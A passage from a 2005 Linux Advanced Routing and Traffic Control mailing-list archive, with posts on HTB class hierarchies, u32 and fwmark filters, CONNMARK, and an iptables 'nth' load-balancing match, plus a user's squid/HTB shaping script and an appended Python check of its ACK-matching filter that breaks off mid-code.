> # root class for my "garanteed bandwidth" service
> tc class add dev eth0 parent 1: classid 1:3 htb rate 10Mbit
>
> # class for a 1Mbit shared bandwidth
> tc class add dev eth0 parent 1:3 classid 1:1024 htb rate 1Mbit
> # qdisc used to _make my life easier scripting classes numbers_
> tc qdisc add dev eth0 parent 1:1024 handle 1024: htb default 250
> # default class for this second qdisc
> tc class add dev eth0 parent 1024: classid 1024:250 htb rate 32kbit
>
> # each customer gets the following class and filter
> tc class add dev eth0 parent 1024: classid 1024:1 htb rate 256kbit
> tc filter add dev eth0 parent 1: protocol ip prio 1 u32 match ip dst
> xxx.xxx.xxx.xxx/yy flowid 1024:1
>
> # another customer...
> tc class add dev eth0 parent 1024: classid 1024:2 htb rate 256kbit
> tc filter add dev eth0 parent 1: protocol ip prio 1 u32 match ip dst
> www.www.www.www/zzz flowid 1024:2
>
>
> My problem is that this filters are created but they don't send traffic
> to the expected class. All traffic is going to 1:2 (default class). Can
> somebody tell me why?
>
> I apreciate any help, I'm in trouble with this...
>
> tks in advance.
>
> Andre

You've created a double htb like in the simulation example on deviks' page.

You need to filter from the top of the first htb to the second then filter from there.

Below works for me

Andy.

# root stuff
tc qdisc add dev eth0 root handle 1: htb default 2
tc class add dev eth0 parent 1: classid 1:1 htb rate 50000kbit
# default class
tc class add dev eth0 parent 1: classid 1:2 htb rate 2000kbit

# root class for my "garanteed bandwidth" service
tc class add dev eth0 parent 1: classid 1:3 htb rate 10Mbit

# class for a 1Mbit shared bandwidth
tc class add dev eth0 parent 1:3 classid 1:1024 htb rate 1Mbit
# qdisc used to _make my life easier scripting classes numbers_
tc qdisc add dev eth0 parent 1:1024 handle 1024: htb default 250
# default class for this second qdisc
tc class add dev eth0 parent 1024: classid 1024:250 htb rate 32kbit

tc filter add dev eth0 parent 1: protocol ip prio 1 u32 match ip dst 192.168.0.1 flowid 1:1024
tc filter add dev eth0 parent 1: protocol ip prio 1 u32 match ip dst 192.168.0.2 flowid 1:1024

# each customer gets the following class and filter
tc class add dev eth0 parent 1024: classid 1024:1 htb rate 256kbit
tc filter add dev eth0 parent 1024: protocol ip prio 1 u32 match ip dst 192.168.0.1 flowid 1024:1

# another customer...
tc class add dev eth0 parent 1024: classid 1024:2 htb rate 256kbit
tc filter add dev eth0 parent 1024: protocol ip prio 1 u32 match ip dst 192.168.0.2 flowid 1024:2

From andy.furniss@dsl.pipex.com Sat Jan 8 02:34:23 2005
From: andy.furniss@dsl.pipex.com (Andy Furniss)
Date: Sat, 08 Jan 2005 02:34:23 +0000
Subject: [LARTC] [PATCH] mark in u32
In-Reply-To: <41DE6484.9050100@dsl.pipex.com>
References: <41DC00E0.2070300@dsl.pipex.com> <20050105151026.GR26856@postel.suug.ch> <41DC06D8.70301@dsl.pipex.com> <20050105155250.GA17836@postel.suug.ch> <41DC1880.6090405@dsl.pipex.com> <41DCFE27.4030704@dsl.pipex.com> <20050106095009.GU26856@postel.suug.ch> <41DD3CBC.1010108@dsl.pipex.com> <20050106164553.GV26856@postel.suug.ch> <41DDC858.6010908@dsl.pipex.com> <20050106232513.GX26856@postel.suug.ch> <41DDCB49.6020105@dsl.pipex.com> <41DDF7C8.4000109@dsl.pipex.com> <41DE6484.9050100@dsl.pipex.com>
Message-ID: <41DF46AF.5070505@dsl.pipex.com>

Andy Furniss wrote:
> Andy Furniss wrote:
>
>> my usb intelli mouse didn't work.
>> the 2.6.10-bk8 didn't autoload it though,
>
> Of course putting -bk8 on my /boot/System.map-2.6.10 will fix that ...

It didn't :-( but I tried more on 2.6.9 and found a u32 that works -

tc filter add dev eth0 parent ffff: prio 1 protocol ip u32 match ip protocol 6 0xff police rate 100kbit burst 10k drop flowid :1

is OK so maybe it is just the fw case that fails.

Andy.

From gypsy@iswest.com Sat Jan 8 04:14:45 2005
From: gypsy@iswest.com (gypsy)
Date: Fri, 07 Jan 2005 20:14:45 -0800
Subject: [LARTC] [PATCH] mark in u32
References: <41DC00E0.2070300@dsl.pipex.com> <20050105151026.GR26856@postel.suug.ch>
Message-ID: <41DF5E35.7342470C@iswest.com>

Thomas Graf wrote:

> Would you guys like to see esfq included in mainline?

YES!!
gypsy

From gypsy@iswest.com Sat Jan 8 04:58:03 2005
From: gypsy@iswest.com (gypsy)
Date: Fri, 07 Jan 2005 20:58:03 -0800
Subject: [LARTC] [PATCH] mark in u32
References: <41DC00E0.2070300@dsl.pipex.com> <20050105151026.GR26856@postel.suug.ch> <41DF5E35.7342470C@iswest.com>
Message-ID: <41DF685B.2B595FB@iswest.com>

gypsy wrote:
>
> Thomas Graf wrote:
> >
> > Would you guys like to see esfq included in mainline?
>
> YES!!
>
> gypsy

Thomas,

Let me rephrase that. I can't think of any reason that SFQ should be maintained without the E. It makes very little sense to hard code parameters that the user might wish or need to supply. That's the reason for ESFQ. When no parameters are given, it _is_ SFQ; when there are parameters it complies with one's wishes.

Name it what you like, but SFQ desperately needs to accept parameters, and ESFQ should be the only SFQ.

gypsy

From ngohoanggiang1981dh@yahoo.com Sat Jan 8 07:55:57 2005
From: ngohoanggiang1981dh@yahoo.com (ngo giang)
Date: Fri, 7 Jan 2005 23:55:57 -0800 (PST)
Subject: [LARTC] Marking ftp inbound traffic is impossible ?
Message-ID: <20050108075557.73544.qmail@web51605.mail.yahoo.com>

Hello,

I searched the archives mailing list of LARTC. Everyone discussed about marking outbound ftp traffic. I could not find any thread discussed about marking inbound ftp traffic.

With inbound ftp traffic, we don't know the random ports specified by ftp servers in passive mode?

So marking inbound ftp traffic is impossible?

If it is possible, can you tell me,

Thanks in advance,

nhgiang

From jayesh@bol.co.tz Sat Jan 8 09:25:36 2005
From: jayesh@bol.co.tz (jayesh)
Date: Sat, 8 Jan 2005 12:25:36 +0300
Subject: [LARTC] htb script
Message-ID: <001301c4f564$02d71000$fd00000a@jayesh>

dear all

I am newbie, i have 256 kbits of down link and 64 kbits of up link. I am using squid and htb. i have got this while browsing the net, there are some few issues i need help

while running the script i want browsing to be as fast as possible, uplink especially Kazaa should not eat my bandwidth.

eth1 got public ip address and eth0 is internal with network 10.0.0.0/24. I am also using nat, how can i make squid incorporate with htb (squid uses 3128)

here is my script

please help with clarification

regards

Dealing in Computers, Software and Peripherals
Jayesh Chandran
Compucat Technologies (An associate of Milan Cable Television)
1.Goliondoi Road, Arusha.
2.Ground Floor, Serengeti Wing, PB No. 10367, AICC, Arusha, Tanzania
jayesh@bol.co.tz
tel: +255 27 2502660
fax: +255 27 2504527
mobile: +255 748 586169

Content-Disposition: attachment; filename="rc.txt"

#!/bin/bash
TC=/sbin/tc
IPTABLES=/sbin/iptables
$TC qdisc del dev eth0 root 2> /dev/null > /dev/null
$TC qdisc del dev eth1 root 2> /dev/null > /dev/null
$TC qdisc del dev eth1 ingress 2> /dev/null > /dev/null
$IPTABLES -F POSTROUTING -t mangle

$TC qdisc add dev eth0 root handle 1: htb default 50 r2q 2
$TC class add dev eth0 parent 1: classid 1:2 htb rate 248Kbit burst 35k
$TC class add dev eth0 parent 1:2 classid 1:10 htb rate 220Kbit ceil 240Kbit burst 25k prio 0
$TC class add dev eth0 parent 1:2 classid 1:30 htb rate 28Kbit ceil 28Kbit burst 10k prio 1
$TC class add dev eth0 parent 1: classid 1:60 htb rate 1Kbit ceil 100Mbit prio 1
$TC qdisc add dev eth0 parent 1:10 handle 11: sfq perturb 10
$TC qdisc add dev eth0 parent 1:30 handle 33: sfq perturb 10

$IPTABLES -t mangle -A POSTROUTING -o eth0 -s ! 10.0.0.0/24 -j MARK --set-mark 3
$IPTABLES -t mangle -A POSTROUTING -o eth0 -s ! 10.0.0.0/24 -p tcp --sport 80 -j MARK --set-mark 1
$IPTABLES -t mangle -A POSTROUTING -o eth0 -s ! 10.0.0.0/24 -p tcp --sport 443 -j MARK --set-mark 1
$IPTABLES -t mangle -A POSTROUTING -o eth0 -s ! 10.0.0.0/24 -p tcp --sport 22 -j MARK --set-mark 1
$IPTABLES -t mangle -A POSTROUTING -o eth0 -s ! 10.0.0.0/24 -p tcp --sport 21 -j MARK --set-mark 1
$IPTABLES -t mangle -A POSTROUTING -o eth0 -s ! 10.0.0.0/24 -p tcp --sport 53 -j MARK --set-mark 1
$IPTABLES -t mangle -A POSTROUTING -o eth0 -s ! 10.0.0.0/24 -p udp --sport 53 -j MARK --set-mark 1
$IPTABLES -t mangle -A POSTROUTING -o eth0 -s ! 10.0.0.0/24 -p tcp --sport 110 -j MARK --set-mark 1
$IPTABLES -t mangle -A POSTROUTING -o eth0 -s ! 10.0.0.0/24 -p tcp --sport 5190 -j MARK --set-mark 1
$IPTABLES -t mangle -A POSTROUTING -o eth0 -s ! 10.0.0.0/24 -p tcp --sport 6661:6669 -j MARK --set-mark 1
$IPTABLES -t mangle -A POSTROUTING -o eth0 -s ! 10.0.0.0/24 -p tcp --sport 3128 -j MARK --set-mark 1
$IPTABLES -t mangle -A POSTROUTING -o eth0 -s ! 10.0.0.0/24 -p udp --sport 3128 -j MARK --set-mark 1
#$IPTABLES -t mangle -A POSTROUTING -o eth0 -s ! 10.0.0.0/24 -p icmp -j MARK --set-mark 1

$TC filter add dev eth0 parent 1:0 protocol ip handle 1 fw flowid 1:10
$TC filter add dev eth0 parent 1:0 protocol ip handle 3 fw flowid 1:30
$TC filter add dev eth0 parent 1:0 protocol ip prio 1 u32 \
    match ip protocol 0x6 0xff \
    match ip tos 0x10 0xff \
    flowid 1:60

##############################
$TC qdisc add dev eth1 root handle 1: htb default 20
$TC class add dev eth1 parent 1: classid 1:1 htb rate 62Kbit burst 35k
$TC class add dev eth1 parent 1:1 classid 1:10 htb rate 40Kbit ceil 60Kbit burst 25k prio 1
$TC class add dev eth1 parent 1:1 classid 1:20 htb rate 15Kbit ceil 55Kbit burst 10k prio 2
$TC class add dev eth1 parent 1:1 classid 1:30 htb rate 7Kbit ceil 28Kbit burst 5k prio 3
$TC qdisc add dev eth1 parent 1:10 handle 10: sfq perturb 10
$TC qdisc add dev eth1 parent 1:20 handle 20: sfq perturb 10
$TC qdisc add dev eth1 parent 1:30 handle 30: sfq perturb 10

$TC filter add dev eth1 parent 1:0 protocol ip prio 10 u32 \
    match ip tos 0x10 0xff flowid 1:10
$TC filter add dev eth1 parent 1: protocol ip prio 10 u32 \
    match ip protocol 6 0xff \
    match u8 0x05 0x0f at 0 \
    match u16 0x0000 0xffc0 at 2 \
    match u8 0x10 0xff at 33 \
    flowid 1:10

$IPTABLES -t mangle -A POSTROUTING -o eth1 -s ! 10.0.0.0/24 -j MARK --set-mark 12
# $IPTABLES -t mangle -A POSTROUTING -o eth1 -s ! 10.0.0.0/24 -p icmp -j MARK --set-mark 11
$IPTABLES -t mangle -A POSTROUTING -o eth1 -s ! 10.0.0.0/24 -p tcp --sport 22 -j MARK --set-mark 11
$IPTABLES -t mangle -A POSTROUTING -o eth1 -s ! 10.0.0.0/24 -p tcp --sport 80 -j MARK --set-mark 11
$IPTABLES -t mangle -A POSTROUTING -o eth1 -s ! 10.0.0.0/24 -p tcp --dport 80 -j MARK --set-mark 11
$IPTABLES -t mangle -A POSTROUTING -o eth1 -s ! 10.0.0.0/24 -p tcp --dport 21 -j MARK --set-mark 11
$IPTABLES -t mangle -A POSTROUTING -o eth1 -s ! 10.0.0.0/24 -p tcp --dport 20 -j MARK --set-mark 11
$IPTABLES -t mangle -A POSTROUTING -o eth1 -s ! 10.0.0.0/24 -p tcp --sport 3128 -j MARK --set-mark 11
$IPTABLES -t mangle -A POSTROUTING -o eth1 -s ! 10.0.0.0/24 -p tcp --dport 3128 -j MARK --set-mark 11
$IPTABLES -t mangle -A POSTROUTING -o eth1 -s 10.0.0.0/24 -j MARK --set-mark 13
$IPTABLES -t mangle -A POSTROUTING -o eth1 -s 10.0.0.0/24 -p tcp --dport 80 -j MARK --set-mark 11
$IPTABLES -t mangle -A POSTROUTING -o eth1 -s 10.0.0.0/24 -p tcp --dport 443 -j MARK --set-mark 11
$IPTABLES -t mangle -A POSTROUTING -o eth1 -s 10.0.0.0/24 -p tcp --dport 53 -j MARK --set-mark 11
$IPTABLES -t mangle -A POSTROUTING -o eth1 -s 10.0.0.0/24 -p udp --dport 53 -j MARK --set-mark 11
$IPTABLES -t mangle -A POSTROUTING -o eth1 -s 10.0.0.0/24 -p tcp --dport 22 -j MARK --set-mark 11
$IPTABLES -t mangle -A POSTROUTING -o eth1 -s 10.0.0.0/24 -p tcp --dport 23 -j MARK --set-mark 11
$IPTABLES -t mangle -A POSTROUTING -o eth1 -s 10.0.0.0/24 -p tcp --dport 21 -j MARK --set-mark 11
$IPTABLES -t mangle -A POSTROUTING -o eth1 -s 10.0.0.0/24 -p tcp --dport 25 -j MARK --set-mark 11
$IPTABLES -t mangle -A POSTROUTING -o eth1 -s 10.0.0.0/24 -p tcp --dport 110 -j MARK --set-mark 11
$IPTABLES -t mangle -A POSTROUTING -o eth1 -s 10.0.0.0/24 -p tcp --dport 5190 -j MARK --set-mark 11
$IPTABLES -t mangle -A POSTROUTING -o eth1 -s 10.0.0.0/24 -p tcp --dport 6661:6669 -j MARK --set-mark 11
$IPTABLES -t mangle -A POSTROUTING -p icmp -j MARK --set-mark 11
$IPTABLES -t mangle -A POSTROUTING -o eth0 -s 10.0.0.0/24 -p udp --dport 3128 -j MARK --set-mark 11
$IPTABLES -t mangle -A POSTROUTING -o eth0 -s 10.0.0.0/24 -p tcp --dport 3128 -j MARK --set-mark 11
#$IPTABLES -t mangle -A POSTROUTING -p icmp -j RETURN

$TC filter add dev eth1 parent 1:0 protocol ip handle 11 fw flowid 1:10
$TC filter add dev eth1 parent 1:0 protocol ip handle 12 fw flowid 1:20
$TC filter add dev eth1 parent 1:0 protocol ip handle 13 fw flowid 1:30

From jnk@pwn.emphyrio.org Sat Jan 8 09:48:18 2005
From: jnk@pwn.emphyrio.org (Dimitris Kotsonis)
Date: Sat, 08 Jan 2005 11:48:18 +0200
Subject: [LARTC] Marking ftp inbound traffic is impossible ?
In-Reply-To: <20050108075557.73544.qmail@web51605.mail.yahoo.com>
References: <20050108075557.73544.qmail@web51605.mail.yahoo.com>
Message-ID: <41DFAC62.6090309@pwn.emphyrio.org>

ngo giang wrote:
> Hello,
>
> I searched the archives mailing list of LARTC. Everyone discussed about
> marking outbound ftp
>
> traffic . I could not find any thread discussed about marking inbound
> ftp traffic.
>
> With inbound ftp traffic , we don't know the random ports specified by
> ftp servers in passive mode ?
>
> So marking inbound ftp traffic is impossible ?
>
> If it is possible, can you tell me,
>
> Thanks in advance,
>
> nhgiang

Use CONNMARK and owner match.

For example, to mark incoming and outgoing packets of vsftpd with fwmark 12 use the following ...

iptables -t mangle -A OUTPUT -j CONNMARK --restore-mark
iptables -t mangle -A OUTPUT -m owner --cmd-owner vsftpd -j MARK --set-mark 12
iptables -t mangle -A OUTPUT -j CONNMARK --save-mark

From andy.furniss@dsl.pipex.com Sat Jan 8 11:57:14 2005
From: andy.furniss@dsl.pipex.com (Andy Furniss)
Date: Sat, 08 Jan 2005 11:57:14 +0000
Subject: [LARTC] Marking ftp inbound traffic is impossible ?
In-Reply-To: <20050108075557.73544.qmail@web51605.mail.yahoo.com>
References: <20050108075557.73544.qmail@web51605.mail.yahoo.com>
Message-ID: <41DFCA9A.5090605@dsl.pipex.com>

ngo giang wrote:
> Hello,
>
> I searched the archives mailing list of LARTC. Everyone discussed about marking outbound ftp
>
> traffic . I could not find any thread discussed about marking inbound ftp traffic.
> > With inbound ftp traffic , we don't know the random ports specified by ftp servers in passive mode ? > > So marking inbound ftp traffic is impossible ? > > If it is possible, can you tell me, > > Thanks in advance, > > nhgiang There's an ftp protocol netfilter match - if you are conntracking maybe that will do it - never tested it myself. Andy. From stef.coene@docum.org Sat Jan 8 11:58:42 2005 From: stef.coene@docum.org (Stef Coene) Date: Sat, 8 Jan 2005 12:58:42 +0100 Subject: [LARTC] tc and ntop inconsistent data flow In-Reply-To: <42020.212.175.247.7.1105115367.squirrel@webmail2.kibris.net> References: <50784.212.175.247.7.1105025581.squirrel@webmail2.kibris.net> <200501062028.16256.stef.coene@docum.org> <42020.212.175.247.7.1105115367.squirrel@webmail2.kibris.net> Message-ID: <200501081258.42878.stef.coene@docum.org> On Friday 07 January 2005 17:29, Mehmet Ali Suzen wrote: > Dear Stef Coene, > Many thanks for the tip. Seems like it is working now. But > I have restrict 2 way traffic with 42 Kbit, that is correspond > to 64 Kbit. Is it logical? I don't undestand what you want to say .... > What is the proportion between > dowload and upload in an ideal data flow? That depends on the type dateflow. Stef From andy.furniss@dsl.pipex.com Sat Jan 8 12:02:50 2005 From: andy.furniss@dsl.pipex.com (Andy Furniss) Date: Sat, 08 Jan 2005 12:02:50 +0000 Subject: [LARTC] How to balance OUTBOUND traffic by packet if.. In-Reply-To: <1383.192.168.1.2.1105108845@maild.mine.nu> References: <1383.192.168.1.2.1105108845@maild.mine.nu> Message-ID: <41DFCBEA.2090809@dsl.pipex.com> junk@maild.mine.nu wrote: > how to use iproute/iptables to balance by packet OUTBOUND traffic between > 2 PPP (pptp cable modem and pppoe adsl modem) links to the same ISP . 
also > by using the fact that the ISP dosen't filter source IP address - meaning > i can use either PPP's link assigned IP address as the source IP in the ip > header.., it works for both devices.., what i want to achive is : when > uploading a large file , i could use both devices to shoot data but bound > only to one source IP. > > Naturally i could expect all data to go back through the device with that > corresponding IP , atleast that is what happens according to ethereal Quick copy n past of a reply I gave recently. Another way you could look into is doing it at IP level using the netfilter patch Nth. You could just round robin packets over the links - not as nice as multilink as packet size isn't accounted for, but may be OK in practise. Below is the help for it - You may not need to do the NAT but AIUI you could use it to mark and then route using the marks. Andy. Author: Fabrice MARIE Status: Works For Me. This option adds CONFIG_IP_NF_MATCH_NTH, which supplies a match module that will allow you to match every Nth packet encountered. By default there are 16 different counters that can be used. This match functions in one of two ways 1) Match ever Nth packet, and only the Nth packet. example: iptables -t mangle -A PREROUTING -m nth --every 10 -j DROP This rule will drop every 10th packet. 2) Unique rule for every packet. This is an easy and quick method to produce load-balancing for both inbound and outbound. example: iptables -t nat -A POSTROUTING -o eth0 -m nth --counter 7 \ --every 3 --packet 0 -j SNAT --to-source 10.0.0.5 iptables -t nat -A POSTROUTING -o eth0 -m nth --counter 7 \ --every 3 --packet 1 -j SNAT --to-source 10.0.0.6 iptables -t nat -A POSTROUTING -o eth0 -m nth --counter 7 \ --every 3 --packet 2 -j SNAT --to-source 10.0.0.7 This example evenly splits connections between the three SNAT addresses. By using the mangle table and iproute2, you can setup complex load-balanced routing. There's lot of other uses. Be creative! 
Supported options are: --every Nth Match every Nth packet [--counter] num Use counter 0-15 (default:0) [--start] num Initialize the counter at the number 'num' instead of 0. Must be between 0 and Nth-1 [--packet] num Match on 'num' packet. Must be between 0 and Nth-1. If --packet is used for a counter then there must be Nth number of --packet rules, covering all values between 0 and Nth-1 inclusively. Andy. From bhleandro@ig.com.br Sat Jan 8 13:02:44 2005 From: bhleandro@ig.com.br (Leandro Travaglia) Date: Sat, 08 Jan 2005 11:02:44 -0200 Subject: [LARTC] CONNMARK problem In-Reply-To: <1103856503.21586.47.camel@neuromancer.home.net> References: <1103856503.21586.47.camel@neuromancer.home.net> Message-ID: <41DFD9F4.6020408@ig.com.br> Hi all, I have IPTABLES 1.2.10 and i have a weird problem with CONNMARK When i run: # iptables -v -t mangle -F # iptables -v -t mangle -A PREROUTING -p tcp -j CONNMARK --restore-mark CONNMARK tcp opt -- in * out * 0.0.0.0/0 -> 0.0.0.0/0 CONNMARK restore iptables: No chain/target/match by that name Why is that happening?? The command: # iptables -v -j CONNMARK -h returns: CONNMARK target v1.2.10 options: --set-mark value[/mask] Set conntrack mark value --save-mark [--mask mask] Save the packet nfmark in the connection --restore-mark [--mask mask] Restore saved nfmark value So everything seems fine to me........ Thanks... From jayesh@bol.co.tz Sat Jan 8 15:32:05 2005 From: jayesh@bol.co.tz (jayesh) Date: Sat, 8 Jan 2005 18:32:05 +0300 Subject: [LARTC] script Message-ID: <002401c4f597$351c2400$fd00000a@jayesh>
dear all

I am a newbie, I have 256 kbits of down link and 64 kbits of up link. I am using squid and htb. I got this while browsing the net, there are a few issues I need help with.

while running the script I want browsing to be as fast as possible, uplink, especially Kazaa, should not eat my bandwidth.

eth1 has a public ip address and eth0 is internal with network 10.0.0.0/24. I am also using nat, how can I make squid incorporate with htb (squid uses 3128)

here is my script

#!/bin/bash
TC=/sbin/tc
IPTABLES=/sbin/iptables
$TC qdisc del dev eth0 root 2> /dev/null > /dev/null
$TC qdisc del dev eth1 root 2> /dev/null > /dev/null
$TC qdisc del dev eth1 ingress 2> /dev/null > /dev/null
$IPTABLES -F POSTROUTING -t mangle
$TC qdisc add dev eth0 root handle 1: htb default 50 r2q 2

$TC class add dev eth0 parent 1: classid 1:2 htb rate 248Kbit burst 35k
$TC class add dev eth0 parent 1:2 classid 1:10 htb rate 220Kbit ceil 240Kbit burst 25k prio 0
$TC class add dev eth0 parent 1:2 classid 1:30 htb rate 28Kbit ceil 28Kbit burst 10k prio 1
$TC class add dev eth0 parent 1: classid 1:60 htb rate 1Kbit ceil 100Mbit prio 1
$TC qdisc add dev eth0 parent 1:10 handle 11: sfq perturb 10
$TC qdisc add dev eth0 parent 1:30 handle 33: sfq perturb 10
$IPTABLES -t mangle -A POSTROUTING -o eth0 -s ! 10.0.0.0/24 -j MARK --set-mark 3
$IPTABLES -t mangle -A POSTROUTING -o eth0 -s ! 10.0.0.0/24 -p tcp --sport 80 -j MARK --set-mark 1
$IPTABLES -t mangle -A POSTROUTING -o eth0 -s ! 10.0.0.0/24 -p tcp --sport 443 -j MARK --set-mark 1
$IPTABLES -t mangle -A POSTROUTING -o eth0 -s ! 10.0.0.0/24 -p tcp --sport 22 -j MARK --set-mark 1
$IPTABLES -t mangle -A POSTROUTING -o eth0 -s ! 10.0.0.0/24 -p tcp --sport 21 -j MARK --set-mark 1
$IPTABLES -t mangle -A POSTROUTING -o eth0 -s ! 10.0.0.0/24 -p tcp --sport 53 -j MARK --set-mark 1
$IPTABLES -t mangle -A POSTROUTING -o eth0 -s ! 10.0.0.0/24 -p udp --sport 53 -j MARK --set-mark 1
$IPTABLES -t mangle -A POSTROUTING -o eth0 -s ! 10.0.0.0/24 -p tcp --sport 110 -j MARK --set-mark 1
$IPTABLES -t mangle -A POSTROUTING -o eth0 -s ! 10.0.0.0/24 -p tcp --sport 5190 -j MARK --set-mark 1
$IPTABLES -t mangle -A POSTROUTING -o eth0 -s ! 10.0.0.0/24 -p tcp --sport 6661:6669 -j MARK --set-mark 1
$IPTABLES -t mangle -A POSTROUTING -o eth0 -s ! 10.0.0.0/24 -p tcp --sport 3128 -j MARK --set-mark 1
$IPTABLES -t mangle -A POSTROUTING -o eth0 -s ! 10.0.0.0/24 -p udp --sport 3128 -j MARK --set-mark 1
#$IPTABLES -t mangle -A POSTROUTING -o eth0 -s ! 10.0.0.0/24 -p icmp -j MARK --set-mark 1

$TC filter add dev eth0 parent 1:0 protocol ip handle 1 fw flowid 1:10
$TC filter add dev eth0 parent 1:0 protocol ip handle 3 fw flowid 1:30
$TC filter add dev eth0 parent 1:0 protocol ip prio 1 u32 \
   match ip protocol 0x6 0xff \
   match ip tos 0x10 0xff \
   flowid 1:60

##############################
$TC qdisc add dev eth1 root handle 1: htb default 20
$TC class add dev eth1 parent 1: classid 1:1 htb rate 62Kbit burst 35k
$TC class add dev eth1 parent 1:1 classid 1:10 htb rate 40Kbit ceil 60Kbit burst 25k prio 1
$TC class add dev eth1 parent 1:1 classid 1:20 htb rate 15Kbit ceil 55Kbit burst 10k prio 2
$TC class add dev eth1 parent 1:1 classid 1:30 htb rate 7Kbit ceil 28Kbit burst 5k prio 3
$TC qdisc add dev eth1 parent 1:10 handle 10: sfq perturb 10
$TC qdisc add dev eth1 parent 1:20 handle 20: sfq perturb 10
$TC qdisc add dev eth1 parent 1:30 handle 30: sfq perturb 10
$TC filter add dev eth1 parent 1:0 protocol ip prio 10 u32 \
   match ip tos 0x10 0xff flowid 1:10
$TC filter add dev eth1 parent 1: protocol ip prio 10 u32 \
   match ip protocol 6 0xff \
   match u8 0x05 0x0f at 0 \
   match u16 0x0000 0xffc0 at 2 \
   match u8 0x10 0xff at 33 \
   flowid 1:10

$IPTABLES -t mangle -A POSTROUTING -o eth1 -s ! 10.0.0.0/24 -j MARK --set-mark 12
# $IPTABLES -t mangle -A POSTROUTING -o eth1 -s ! 10.0.0.0/24 -p icmp -j MARK --set-mark 11
$IPTABLES -t mangle -A POSTROUTING -o eth1 -s ! 10.0.0.0/24 -p tcp --sport 22 -j MARK --set-mark 11
$IPTABLES -t mangle -A POSTROUTING -o eth1 -s ! 10.0.0.0/24 -p tcp --sport 80 -j MARK --set-mark 11
$IPTABLES -t mangle -A POSTROUTING -o eth1 -s ! 10.0.0.0/24 -p tcp --dport 80 -j MARK --set-mark 11
$IPTABLES -t mangle -A POSTROUTING -o eth1 -s ! 10.0.0.0/24 -p tcp --dport 21 -j MARK --set-mark 11
$IPTABLES -t mangle -A POSTROUTING -o eth1 -s ! 10.0.0.0/24 -p tcp --dport 20 -j MARK --set-mark 11
$IPTABLES -t mangle -A POSTROUTING -o eth1 -s ! 10.0.0.0/24 -p tcp --sport 3128 -j MARK --set-mark 11
$IPTABLES -t mangle -A POSTROUTING -o eth1 -s ! 10.0.0.0/24 -p tcp --dport 3128 -j MARK --set-mark 11
$IPTABLES -t mangle -A POSTROUTING -o eth1 -s 10.0.0.0/24 -j MARK --set-mark 13

$IPTABLES -t mangle -A POSTROUTING -o eth1 -s 10.0.0.0/24 -p tcp --dport 80 -j MARK --set-mark 11
$IPTABLES -t mangle -A POSTROUTING -o eth1 -s 10.0.0.0/24 -p tcp --dport 443 -j MARK --set-mark 11
$IPTABLES -t mangle -A POSTROUTING -o eth1 -s 10.0.0.0/24 -p tcp --dport 53 -j MARK --set-mark 11
$IPTABLES -t mangle -A POSTROUTING -o eth1 -s 10.0.0.0/24 -p udp --dport 53 -j MARK --set-mark 11
$IPTABLES -t mangle -A POSTROUTING -o eth1 -s 10.0.0.0/24 -p tcp --dport 22 -j MARK --set-mark 11
$IPTABLES -t mangle -A POSTROUTING -o eth1 -s 10.0.0.0/24 -p tcp --dport 23 -j MARK --set-mark 11
$IPTABLES -t mangle -A POSTROUTING -o eth1 -s 10.0.0.0/24 -p tcp --dport 21 -j MARK --set-mark 11
$IPTABLES -t mangle -A POSTROUTING -o eth1 -s 10.0.0.0/24 -p tcp --dport 25 -j MARK --set-mark 11
$IPTABLES -t mangle -A POSTROUTING -o eth1 -s 10.0.0.0/24 -p tcp --dport 110 -j MARK --set-mark 11
$IPTABLES -t mangle -A POSTROUTING -o eth1 -s 10.0.0.0/24 -p tcp --dport 5190 -j MARK --set-mark 11
$IPTABLES -t mangle -A POSTROUTING -o eth1 -s 10.0.0.0/24 -p tcp --dport 6661:6669 -j MARK --set-mark 11
$IPTABLES -t mangle -A POSTROUTING -p icmp -j MARK --set-mark 11
$IPTABLES -t mangle -A POSTROUTING -o eth0 -s 10.0.0.0/24 -p udp --dport 3128 -j MARK --set-mark 11
$IPTABLES -t mangle -A POSTROUTING -o eth0 -s 10.0.0.0/24 -p tcp --dport 3128 -j MARK --set-mark 11
#$IPTABLES -t mangle -A POSTROUTING -p icmp -j RETURN
$TC filter add dev eth1 parent 1:0 protocol ip handle 11 fw flowid 1:10
$TC filter add dev eth1 parent 1:0 protocol ip handle 12 fw flowid 1:20
$TC filter add dev eth1 parent 1:0 protocol ip handle 13 fw flowid 1:30

please help with clarification

regards

Dealing in Computers, Software and Peripherals
Jayesh Chandran
Compucat Technologies (An associate of Milan Cable Television)
1. Goliondoi Road, Arusha.
2. Ground Floor, Serengeti Wing, PB No. 10367, AICC, Arusha, Tanzania
jayesh@bol.co.tz
tel: +255 27 2502660
fax: +255 27 2504527
mobile: +255 748 586169
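The second eth1 u32 filter in the script above is the usual "small pure ACK" match; the Python below is an added example (not part of the original post) that applies the same selectors, and the TOS selector of the first filter, to constructed IPv4/TCP packets to show which ones reach class 1:10 and why the IHL selector is needed. The packet builder, addresses, sample packets and function names are assumptions made for the illustration, and the byte-wise matching models what the kernel does on 32-bit words.

```python
import struct

# Selectors of the second eth1 u32 filter in the script, written as
# (width in bytes, value, mask, offset from the start of the IP header).
ACK_FILTER = [
    (1, 0x06, 0xFF, 9),       # match ip protocol 6 0xff      -> TCP
    (1, 0x05, 0x0F, 0),       # match u8 0x05 0x0f at 0       -> IHL 5, no IP options
    (2, 0x0000, 0xFFC0, 2),   # match u16 0x0000 0xffc0 at 2  -> total length < 64
    (1, 0x10, 0xFF, 33),      # match u8 0x10 0xff at 33      -> TCP flags are ACK only
]
# Selector of the first eth1 u32 filter: match ip tos 0x10 0xff
TOS_FILTER = [(1, 0x10, 0xFF, 1)]
# Hypothetical variant without the IHL selector, to show what it protects against.
NO_IHL_GUARD = [s for s in ACK_FILTER if s[3] != 0]

FIN, SYN, PSH, ACK = 0x01, 0x02, 0x08, 0x10


def u32_match(packet, selectors):
    """True when every selector matches (selectors are ANDed, like u32 keys)."""
    for width, value, mask, offset in selectors:
        field = packet[offset:offset + width]
        if len(field) < width:          # packet too short to contain the field
            return False
        if (int.from_bytes(field, "big") & mask) != (value & mask):
            return False
    return True


def build_packet(flags, payload_len=0, tcp_opts=b"", ip_opts=b"", tos=0, ack_no=2000):
    """Build a constructed IPv4/TCP packet (checksums left at zero)."""
    if len(tcp_opts) % 4 or len(ip_opts) % 4:
        raise ValueError("options must be padded to a multiple of 4 bytes")
    ihl = 5 + len(ip_opts) // 4
    doff = 5 + len(tcp_opts) // 4
    total = 4 * ihl + 4 * doff + payload_len
    ip = struct.pack("!BBHHHBBH4s4s", (4 << 4) | ihl, tos, total, 0, 0, 64, 6, 0,
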